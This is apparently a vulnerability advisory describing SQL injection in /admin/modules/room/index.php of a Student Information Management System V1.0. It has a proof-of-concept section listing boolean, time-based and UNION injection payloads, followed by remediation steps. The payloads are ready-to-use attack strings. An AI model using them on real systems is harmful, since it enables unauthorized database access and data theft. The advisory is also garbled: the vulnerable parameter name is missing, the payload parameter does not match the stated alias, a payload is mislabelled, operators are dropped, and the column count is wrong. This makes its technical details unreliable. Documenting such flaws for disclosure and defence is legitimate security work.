Critical Vulnerability Information Affected Product Student Information Management System Vulnerable File /admin/modules/room/index.php Version V1.0 Vulnerability Type SQL Injection Root Cause Due to insufficient validation of the user-supplied parameter , attackers can inject malicious SQL code and execute it directly within SQL queries, leading to unauthorized operations. Impact Attackers can exploit this SQL injection vulnerability to gain unauthorized database access, exfiltrate sensitive data, modify data, achieve full system control, or even cause service disruption, posing a severe threat to system security and business continuity. Description During a security review of the Student Information Management System, a critical SQL injection vulnerability was discovered in the file /admin/modules/room/index.php. Due to inadequate input validation for the parameter , attackers can inject malicious SQL queries. As a result, attackers may gain unauthorized access to the database, alter data, and retrieve sensitive information. Immediate remediation is required to ensure system security and protect data integrity. Vulnerability Details and POC Vulnerability Alias id parameter Payload Examples Parameter: id (GET) Type: Boolean-based blind injection - Parameter replacement {original_value} Payload: admin' AND (SELECT 6293 FROM(SELECT COUNT(),CONCAT(0x716a6a7171,(SELECT (ELT(6293=6293,1))),0x716a6a7171,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1 Type: Time-based blind injection (using SLEEP) Payload: admin' AND (SELECT CASE WHEN (9921=9921) THEN SLEEP(5) ELSE (SELECT 8423) END)-- Type: Generic UNION query (NULL) - 8 columns Payload: ViewRoomSlot=-1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b766171,(SELECT (ELT(8423=8423,1))),0x716b766171),NULL,NULL,NULL,NULL,NULL,NULL-- Recommended Remediation 1. Use prepared statements with parameter binding. 2. Implement input validation and filtering. 3. Minimize database user privileges. 4. Conduct regular security audits.